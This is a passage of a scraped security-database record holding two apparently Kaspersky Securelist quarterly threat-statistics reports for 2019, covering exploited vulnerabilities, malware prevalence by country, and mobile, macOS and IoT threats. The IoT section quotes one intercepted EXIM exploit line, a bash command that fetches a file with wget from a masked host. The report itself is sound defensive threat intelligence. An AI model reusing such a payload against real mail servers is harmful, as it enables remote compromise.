SOAP WSDL parser caused malicious code to be injected and the computer to be infected. Microsoft Office vulnerabilities are overrepresented in the statistics partly due to the emergence of openly available generators of malicious documents that exploit these vulnerabilities.\n\nIn Q1, the share of detected vulnerabilities in browsers amounted to 14%, almost five times less than for Microsoft Office. Exploiting browser vulnerabilities is often a problem, since browser developers are forever coming up with new options to safeguard against certain types of vulnerabilities, while the techniques for bypassing them often require the use of entire vulnerability chains to achieve the objective, which significantly increases the cost of such attacks.\n\nHowever, this does not mean that in-depth attacks for browsers do not exist. A prime example is the actively exploited zero-day vulnerability [CVE-2019-5786](<https://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html>) in Google Chrome<https://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html>. To bypass sandboxes, it was [used in conjunction](<https://www.zdnet.com/article/proof-of-concept-code-published-for-windows-7-zero-day/>) with an additional exploit for the vulnerability in the win32k.sys driver ([CVE-2019-0808](<https://securityaffairs.co/wordpress/82428/hacking/cve-2019-0808-win-flaw.html>)), with the targets being users of 32-bit versions of Windows 7.\n\nIt is fair to say that Q1 2019, like the quarter before it, was marked by a large number of zero-day targeted attacks. Kaspersky Lab researchers found an actively exploited zero-day vulnerability in the Windows kernel, which was assigned the ID [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>). This vulnerability exploited race conditions caused by a lack of thread synchronization during undocumented system calls, resulting in Use-After-Free. It is worth noting that [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) is the fourth zero-day vulnerability for Windows found by Kaspersky Lab recent months.\n\nA remarkable event at the beginning of the year was the discovery by researchers of the [CVE-2018-20250](<https://www.tenable.com/blog/winrar-absolute-path-traversal-vulnerability-leads-to-remote-code-execution-cve-2018-20250-0>) vulnerability, which had existed for 19 years in the module for unpacking ACE archives in the WinRAR utility. This component lacks sufficient checks of the file path, and a specially created ACE archive allows cybercriminals to inject an executable file into the system autorun directory. The vulnerability was immediately used to start distributing malicious archives.\n\nDespite the fact that two years have passed since the vulnerabilities in the FuzzBunch exploit kit (EternalBlue, EternalRomance, etc.) were patched, these attacks still occupy all the top positions in our statistics. This is facilitated by the ongoing growth of malware that uses these exploits as a vector to distribute itself inside corporate networks.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks:\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2019, Kaspersky Lab solutions blocked **843,096,461** attacks launched from online resources located in 203 countries across the globe. **113,640,221** unique URLs were recognized as malicious by Web Anti-Virus components.\n\n**_Distribution of web attack sources by country, Q1 2019_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172506/en-web-attack-source.png>)\n\nThis quarter, Web Anti-Virus was most active on resources located in the US.\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Venezuela | 29.76 \n2 | Algeria | 25.10 \n3 | Greece | 24,16 \n4 | Albania | 23.57 \n5 | Estonia | 20.27 \n6 | Moldova | 20.09 \n7 | Ukraine | 19.97 \n8 | Serbia | 19.61 \n9 | Poland | 18.89 \n10 | Kyrgyzstan | 18.36 \n11 | Azerbaijan | 18.28 \n12 | Belarus | 18.22 \n13 | Tunisia | 18.09 \n14 | Latvia | 17.62 \n15 | Hungary | 17.61 \n16 | Bangladesh | 17,17 \n17 | Lithuania | 16.71 \n18 | Djibouti | 16.66 \n19 | Reunion | 16.65 \n20 | Tajikistan | 16.61 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThese statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.\n\nOn average, 13.18% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n**_Geography of malicious web attacks in Q1 2019 (percentage of attacked users)_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172633/en-web-attacks-map.png>)\n\n## Local threats\n\n_Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, and external hard drives._\n\nIn Q1 2019, our File Anti-Virus detected **247,907,593** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of users of Kaspersky Lab products on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.73 \n2 | Yemen | 57.66 \n3 | Tajikistan | 56.35 \n4 | Afghanistan | 56.13 \n5 | Turkmenistan | 55.42 \n6 | Kyrgyzstan | 51.52 \n7 | Ethiopia | 49.21 \n8 | Syria | 47.64 \n9 | Iraq | 46,16 \n10 | Bangladesh | 45.86 \n11 | Sudan | 45.72 \n12 | Algeria | 45.35 \n13 | Laos | 44.99 \n14 | Venezuela | 44,14 \n15 | Mongolia | 43.90 \n16 | Myanmar | 43.72 \n17 | Libya | 43.30 \n18 | Bolivia | 43,17 \n19 | Belarus | 43.04 \n20 | Azerbaijan | 42.93 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThese statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, or external hard drives.\n\nOn average, 23.62% of user computers globally faced at least one **Malware-class** local threat in Q1.", "cvss3": {}, "published": "2019-05-23T10:00:53", "type": "securelist", "title": "IT threat evolution Q1 2019. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-20250", "CVE-2019-0797", "CVE-2019-0808", "CVE-2019-5786"], "modified": "2019-05-23T10:00:53", "id": "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "href": "https://securelist.com/it-threat-evolution-q1-2019-statistics/90916/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-19T18:27:50", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22101624/malware_SL_pic3-990x400.jpg)\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe.\n * 217,843,293 unique URLs triggered Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 228,206 users.\n * Ransomware attacks were defeated on the computers of 232,292 unique users.\n * Our File Anti-Virus detected 240,754,063 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 753,550 malicious installation packages\n * 13,899 installation packages for mobile banking Trojans\n * 23,294 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nQ2 2019 will be remembered for several events.\n\nFirst, we uncovered a large-scale [financial threat by the name of Riltok](<https://securelist.com/mobile-banker-riltok/91374/>), which targeted clients of not only major Russian banks, but some foreign ones too.\n\nSecond, we detected the new Trojan.AndroidOS.MobOk malware, tasked with stealing money from mobile accounts through exploiting WAP-Click subscriptions. After infection, web activity on the victim device went into overdrive. In particular, the Trojan opened specially created pages, bypassed their CAPTCHA system using a third-party service, and then clicked on the necessary buttons to complete the subscription.\n\nThird, we repeated our [study](<https://securelist.com/beware-of-stalkerware/90264/>) of commercial spyware, a.k.a. stalkerware. And although such software is not malicious in the common sense of the word, it does entail certain risks for victims. So as of April 3, 2019, Kaspersky mobile products for Android notify users of all known commercial spyware.\n\nFourth, we managed to discover a new type of adware app (AdWare.AndroidOS.KeepMusic.a and AdWare.AndroidOS.KeepMusic.b verdicts) that bypasses operating system restrictions on apps running in the background. To stop its thread being terminated, one such adware app launches a music player and plays a silent file. The operating system thinks that the user is listening to music, and does not end the process, which is not displayed on the main screen of the device. At this moment, the device is operating as part of a botnet, supposedly showing ads to the victim. \"Supposedly\" because ads are also shown in background mode, when the victim might not be using the device.\n\nFifth, our attention was caught by the Hideapp family of Trojans. These Trojans spread very actively in Q2, including by means of a time-tested distribution mechanism: antivirus solution logos and porn apps.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153149/it-threat-evolution-q2-2019-statistics-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153149/it-threat-evolution-q2-2019-statistics-1.png>)\n\nFinally, in some versions, the Trojan creators revealed a less-than-positive attitude to managers of one of Russia's largest IT companies:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153203/it-threat-evolution-q2-2019-statistics-2.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153203/it-threat-evolution-q2-2019-statistics-2.png>)\n\n### Mobile threat statistics\n\nIn Q2 2019, Kaspersky detected 753,550 malicious installation packages, which is 151,624 fewer than in the previous quarter.\n\n_Number of detected malicious installation packages, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153226/it-threat-evolution-q2-2019-statistics-3.png>)\n\nWhat's more, this is almost 1 million fewer than the number of malicious installation packages detected in Q2 2018. Over the course of this year, we have seen a steady decline in the amount of new mobile malware. The drop is the result of less cybercriminal activity in adding members to the most common families. \n\n### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q1 and Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153256/it-threat-evolution-q2-2019-statistics-4.png>)\n\nAmong all the threats detected in Q2 2019, the lion's share went to potentially unsolicited RiskTool apps with 41.24%, which is 11 p.p. more than in the previous quarter. The malicious objects most frequently encountered came from the RiskTool.AndroidOS.Agent family (33.07% of all detected threats in this class), RiskTool.AndroidOS.Smssend (15.68%), and RiskTool.AndroidOS.Wapron (14.41%).\n\nIn second place are adware apps, their share having increased by 2.16 p.p. to 18.71% of all detected threats. Most often, adware belonged to the AdWare.AndroidOS.Ewind family (26.46% of all threats in this class), AdWare.AndroidOS.Agent (23.60%), and AdWare.AndroidOS.MobiDash (17.39%).\n\nTrojan-class malware (11.83%) took third place, with its share for the quarter climbing by 2.31 p.p. The majority of detected files belonged to the Trojan.AndroidOS.Boogr family (32.42%) \u2013 this verdict was given to Trojans detected with machine-learning tools. Next come the Trojan.AndroidOS.Hiddapp (24.18%), Trojan.AndroidOS.Agent (14.58%), and Trojan.AndroidOS.Piom (9.73%) families. Note that Agent and Piom are aggregating verdicts that cover a range of Trojan specimens from various developers.\n\nThreats in the Trojan-Dropper class (10.04%) declined noticeably, shedding 15 p.p. Most of the files we detected belonged to the Trojan-Dropper.AndroidOS.Wapnor family (71% of all detected threats in this class), while no other family claimed more than 3%. A typical member of the Wapnor family consists of a random pornographic image, a polymorphic dropper, and a unique executable file. The task of the malware is to sign the victim up to a WAP subscription.\n\nIn Q2 2019, the share of detected mobile bankers slightly decreased: 1.84% versus 3.21% in Q1. The drop is largely due to a decrease in the generation of Trojans in the [Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) family. The most frequently created objects belonged to the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/the-android-trojan-svpeng-now-capable-of-mobile-phishing/57301/>) (30.79% of all detected mobile bankers), Trojan-Banker.AndroidOS.Wroba (17.16%), and Trojan-Banker.AndroidOS.Agent (15.70%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs related to RiskTool or adware._\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 44.37 \n2 | Trojan.AndroidOS.Boogr.gsh | 11.31 \n3 | DangerousObject.AndroidOS.GenericML | 5.66 \n4 | Trojan.AndroidOS.Hiddapp.cr | 4.77 \n5 | Trojan.AndroidOS.Hiddapp.ch | 4.17 \n6 | Trojan.AndroidOS.Hiddapp.cf | 2.81 \n7 | Trojan.AndroidOS.Hiddad.em | 2.53 \n8 | Trojan-Dropper.AndroidOS.Lezok.p | 2.16 \n9 | Trojan-Dropper.AndroidOS.Hqwar.bb | 2.08 \n10 | Trojan-Banker.AndroidOS.Asacub.a | 1.93 \n11 | Trojan-Banker.AndroidOS.Asacub.snt | 1.92 \n12 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.91 \n13 | Trojan.AndroidOS.Hiddapp.cg | 1.89 \n14 | Trojan.AndroidOS.Dvmap.a | 1.88 \n15 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.86 \n16 | Trojan.AndroidOS.Agent.rt | 1.81 \n17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.58 \n18 | Trojan.AndroidOS.Fakeapp.bt | 1.58 \n19 | Trojan.AndroidOS.Agent.eb | 1.49 \n20 | Exploit.AndroidOS.Lotoor.be | 1.46 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked._\n\nAs per tradition, first place in our Top 20 for Q2 went to the DangerousObject.Multi.Generic verdict (44.77%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.\n\nSecond and third places were claimed by Trojan.AndroidOS.Boogr.gsh (11.31%) and DangerousObject.AndroidOS.GenericML (5.66%). These verdicts are assigned to files recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nFourth, fifth, sixth, seventh, and thirteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to secretly download ads onto the infected device. If the user detects the adware app, the Trojan does not prevent its deletion, but re-installs the app at the first opportunity.\n\nEighth position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.16%). This Trojan displays persistent ads, steals money through SMS subscriptions, and inflates hit counters for apps on various platforms.\n\nNinth and fifteenth places were taken by members of the Hqwar dropper family (2.08% and 1.86%, respectively); this malware most often conceals banking Trojans.\n\nTenth and eleventh places went to members of the Asacub family of financial cyberthreats: Trojan-Banker.AndroidOS.Asacub.a (1.93%) and Trojan-Banker.AndroidOS.Asacub.snt (1.92%). Like the Hqwar droppers, this family lost a lot of ground in Q2 2019.\n\n### Geography of mobile threats\n\n_Geography of mobile malware infection attempts, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153325/it-threat-evolution-q2-2019-statistics-5.png>)\n\n#### Top 10 countries by share of users attacked by mobile malware\n\n| Country* | %** \n---|---|--- \n1 | Iran | 28.31 \n2 | Bangladesh | 28.10 \n3 | Algeria | 24.77 \n4 | Pakistan | 24.00 \n5 | Tanzania | 23.07 \n6 | Nigeria | 22.69 \n7 | India | 21.65 \n8 | Indonesia | 18.13 \n9 | Sri Lanka | 15.96 \n10 | Kenya | 15.38 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile bankers as a percentage of all users of Kaspersky mobile solutions in the country._\n\nAt the head of Q2's Top 10 countries by share of attacked users is Iran (28.31%), which took second place in this rating in Q1 2019. Iran displaced Pakistan (24%), which now occupies fourth position.\n\nMost often, users of Kaspersky security solutions in Iran encountered the Trojan.AndroidOS.Hiddapp.bn adware Trojan (21.08%) as well as the potentially unwanted apps RiskTool.AndroidOS.FakGram.a (12.50%), which seeks to intercept messages in Telegram, and RiskTool.AndroidOS.Dnotua.yfe (12.29%).\n\nLike Iran, Bangladesh (28.10%) rose one position in our Top 10. Most often, users in Bangladesh came across various adware aps, including AdWare.AndroidOS.Agent.f (35.68%), AdWare.AndroidOS.HiddenAd.et (14.88%), and AdWare.AndroidOS.Ewind.h (9.65%).\n\nThird place went to Algeria (24.77%), where users of Kaspersky mobile solutions most often ran into the AdWare.AndroidOS.HiddenAd.et (27.15%), AdWare.AndroidOS.Agent.f (14.16%), and AdWare.AndroidOS.Oimobi.a (8.04%) adware apps.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **13,899** installation packages for mobile banking Trojans, down to nearly half the number recorded in Q1 2019.\n\nThe largest contribution was made by the creators of the Svpeng family of Trojans: 30.79% of all detected banking Trojans. Trojan-Banker.AndroidOS.Wroba (17.16%) and Trojan-Banker.AndroidOS.Agent (15.70%) came second and third, respectively. The much-hyped Asacub Trojan (11.98%) managed only fifth.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153349/it-threat-evolution-q2-2019-statistics-6.png>)\n\n**Top 10 mobile banking Trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.a | 13.64 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 13.61 \n3 | Trojan-Banker.AndroidOS.Svpeng.ak | 13.51 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 9.90 \n5 | Trojan-Banker.AndroidOS.Agent.ep | 9.37 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.75 \n7 | Trojan-Banker.AndroidOS.Faketoken.q | 4.18 \n8 | Trojan-Banker.AndroidOS.Asacub.cs | 4.18 \n9 | Trojan-Banker.AndroidOS.Agent.eq | 3.81 \n10 | Trojan-Banker.AndroidOS.Faketoken.z | 3.13 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile antivirus that were attacked by banking threats._\n\nAlmost half our Top 10 mobile bankers in Q2 2019 is made up of modifications of the Trojan-Banker.AndroidOS.Asacub Trojan: four positions out of ten. However, this family's distribution bursts that we registered last quarter were not repeated this time.\n\nAs in Q1, Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep made it into the Top 10; however, they ceded the highest positions to the Svpeng family of Trojans, which is considered one of the longest in existence.\n\n_Geography of mobile banking threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153417/it-threat-evolution-q2-2019-statistics-7.png>)\n\n#### Top 10 countries by share of users attacked by mobile banking Trojans:\n\n| Country* | %** \n---|---|--- \n1 | South Africa | 0.64% \n2 | Russia | 0.31% \n3 | Tajikistan | 0.21% \n4 | Australia | 0.17% \n5 | Turkey | 0.17% \n6 | Ukraine | 0.13% \n7 | Uzbekistan | 0.11% \n8 | Korea | 0.11% \n9 | Armenia | 0.10% \n10 | India | 0.10% \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nIn Q2 2019, South Africa (0.64%) climbed to first place, up from fourth in the previous quarter. In 97% of cases, users in that country encountered Trojan-Banker.AndroidOS.Agent.dx.\n\nSecond place was claimed by Russia (0.31%), where our solutions most often detected members of the Asacub and Svpeng families: Trojan-Banker.AndroidOS.Asacub.a (14.03%), Trojan-Banker.AndroidOS.Asacub.snt (13.96%), and Trojan-Banker.AndroidOS.Svpeng.ak (13.95%).\n\nThird place belongs to Tajikistan (0.21%), where Trojan-Banker.AndroidOS.Faketoken.z (35.96%), Trojan-Banker.AndroidOS.Asacub.a (12.92%), and Trojan- Banker.AndroidOS.Grapereh.j (11.80%) were most frequently met.\n\n### Mobile ransomware Trojans\n\nIn Q2 2019, we detected **23,294** installation packages for mobile Trojan ransomware, which is 4,634 fewer than last quarter.\n\n_Number of installation packages for mobile banking Trojans, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153440/it-threat-evolution-q2-2019-statistics-8.png>)\n\n#### Top 10 mobile ransomware Trojans\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 43.90 \n2 | Trojan-Ransom.AndroidOS.Rkor.i | 11.26 \n3 | Trojan-Ransom.AndroidOS.Rkor.h | 7.81 \n4 | Trojan-Ransom.AndroidOS.Small.as | 6.41 \n5 | Trojan-Ransom.AndroidOS.Svpeng.ah | 5.92 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 3.35 \n7 | Trojan-Ransom.AndroidOS.Fusob.h | 2.48 \n8 | Trojan-Ransom.AndroidOS.Small.o | 2.46 \n9 | Trojan-Ransom.AndroidOS.Pigetrl.a | 2.45 \n10 | Trojan-Ransom.AndroidOS.Small.ce | 2.22 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans._\n\nIn Q2 2019, the most widespread family of ransomware Trojans was Svpeng: three positions in the Top 10.\n\n_Geography of mobile ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153507/it-threat-evolution-q2-2019-statistics-9.png>)\n\n#### Top 10 countries by share of users attacked by mobile ransomware Trojans:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.58 \n2 | Kazakhstan | 0.39 \n3 | Iran | 0.27 \n4 | Pakistan | 0.16 \n5 | Saudi Arabia | 0.10 \n6 | Mexico | 0.09 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Singapore | 0.05 \n10 | Indonesia | 0.05 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)_ \n_** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nThe leaders by number of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.58%), Kazakhstan (0.39%), and Iran (0.27%)\n\n## Attacks on Apple macOS\n\nQ2 witnessed several interesting events, three of which deserve special attention.\n\nA [vulnerability](<https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass>) was discovered in the macOS operating system allowing Gatekeeper and XProtect scans to be bypassed. Exploitation requires creating an archive with a symbolic link to the shared NFS folder containing the file. When the archive is opened, the file from the shared NFS folder is automatically downloaded by the system without any checks. The first malware exploiting this vulnerability was not long in coming; however, all the detected specimens were more likely test versions than actual malware.\n\nVulnerabilities detected in the Firefox browser ([CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>), [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>)) allowed arbitrary code to be executed with a view to sandbox escape. After this information was made public, the first exploitations occurred. Using these vulnerabilities, cybercriminals dropped spyware Trojans from the Mokes and Wirenet families onto victim computers.\n\nAlso an interesting vector for delivering a malicious miner to victims was [discovered](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>). The attackers used social engineering and legitimate apps modified with malicious code. But even more interestingly, the malicious part consisted of a QEMU emulator and a Linux virtual machine, housing the miner. As soon as QEMU was launched on the infected machine, the miner started up inside its image. The scheme is so outlandish \u2013 both QEMU and the miner consume significant resources \u2013 that such a Trojan could not remain unnoticed for long.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.61 \n2 | AdWare.OSX.Spc.a | 12.75 \n3 | AdWare.OSX.Bnodlero.t | 11.98 \n4 | AdWare.OSX.Pirrit.j | 11.27 \n5 | AdWare.OSX.Pirrit.p | 8.42 \n6 | AdWare.OSX.Pirrit.s | 7.76 \n7 | AdWare.OSX.Pirrit.o | 7.59 \n8 | AdWare.OSX.MacSearch.a | 5.92 \n9 | AdWare.OSX.Cimpli.d | 5.76 \n10 | AdWare.OSX.Mcp.a | 5.39 \n11 | AdWare.OSX.Agent.b | 5.11 \n12 | AdWare.OSX.Pirrit.q | 4.31 \n13 | AdWare.OSX.Bnodlero.v | 4.02 \n14 | AdWare.OSX.Bnodlero.q | 3.70 \n15 | AdWare.OSX.MacSearch.d | 3.66 \n16 | Downloader.OSX.InstallCore.ab | 3.58 \n17 | AdWare.OSX.Geonei.as | 3.48 \n18 | AdWare.OSX.Amc.a | 3.29 \n19 | AdWare.OSX.Agent.c | 2.93 \n20 | AdWare.OSX.Mhp.a | 2.90 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nOn the topic of most common threats in Q2, the Shlayer.a Trojan (24.61%) retained top spot. In second place is the adware app AdWare.OSX.Spc.a (12.75%) and in third AdWare.OSX.Bnodlero.t (11.98%), which pushed AdWare.OSX.Pirrit.j (11.27%) into fourth. Like last quarter, most of the Top 20 places went to adware apps. Among them, members of the Pirrit family were particularly prominent: five positions out of 20.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.11 \n2 | Spain | 9.68 \n3 | India | 8.84 \n4 | US | 8.49 \n5 | Canada | 8.35 \n6 | Russia | 8.01 \n7 | Italy | 7.74 \n8 | UK | 7.47 \n9 | Mexico | 7.08 \n10 | Brazil | 6.85 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)_ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn terms of the geographical spread of macOS threats, France (11.11%), Spain (9.68%), and India (8.84%) retained their leadership.\n\nIn the US (8.49%), Canada (8.35%), and Russia (8.01%), the share of infected users increased, ranking these countries respectively fourth, fifth, and sixth in our Top 10.\n\n## IoT attacks\n\n### Interesting events\n\nIn the world of Linux/Unix threats, the most significant event was the active rise in the number of attacks exploiting a new [vulnerability](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) in the EXIM mail transfer agent. In a nutshell, the attacker creates a special email and fills the recipient field with code to be executed on the vulnerable target mail server. The message is then sent using this server. EXIM processes the sent message and executes the code in the recipient field.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153528/it-threat-evolution-q2-2019-statistics-10.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153528/it-threat-evolution-q2-2019-statistics-10.png>)\n\n_Intercepted attack traffic_\n\nThe screenshot shows a message whose RCPT field contains the shell script. The latter actually looks as follows: \n \n \n /bin/bash -c \"wget X.X.X.X/exm -O /dev/null\n\n### IoT threat statistics\n\nQ2 2019 demonstrated a significant drop in attacks via telnet: around 60% versus 80% in Q1. The assumption is that cybercriminals are gradually switching to more productive hardware enabling the use of SSH. \n \nSSH | 40.43% \nTelnet | 59.57% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2019_\n\nHowever, in terms of number of sessions involving Kaspersky Lab [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), we see a decline for SSH from 64% in Q1 to 49.6% in Q2. \n \nSSH | 49.59% \nTelnet | 50.41% \n \n_Distribution of cybercriminals' working sessions with Kaspersky Lab traps, Q2 2019_\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab telnet traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153555/it-threat-evolution-q2-2019-statistics-11.png>)\n\n#### **Top 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky Lab traps**\n\n| Country | % \n---|---|--- \n1 | Egypt | 15.06 \n2 | China | 12.27 \n3 | Brazil | 10.24 \n4 | US | 5.23 \n5 | Russia | 5.03 \n6 | Greece | 4.54 \n7 | Iran | 4.06 \n8 | Taiwan | 3.15 \n9 | India | 3.04 \n10 | Turkey | 2.90 \n \nFor the second quarter in a row, Egypt (15.06%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab traps. Second place, by a small margin, went to China (12.27%), with Brazil (10.24%) in third.\n\nTelnet-based attacks most often used a member of the infamous Mirai malware family as ammunition.\n\n#### **Top 10 malware downloaded to infected IoT devices via successful telnet-based attacks **\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.92 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 26.48 \n3 | Backdoor.Linux.Mirai.ba | 26.48 \n4 | Backdoor.Linux.Mirai.au | 15.75 \n5 | Backdoor.Linux.Gafgyt.bj | 2.70 \n6 | Backdoor.Linux.Mirai.ad | 2.57 \n7 | 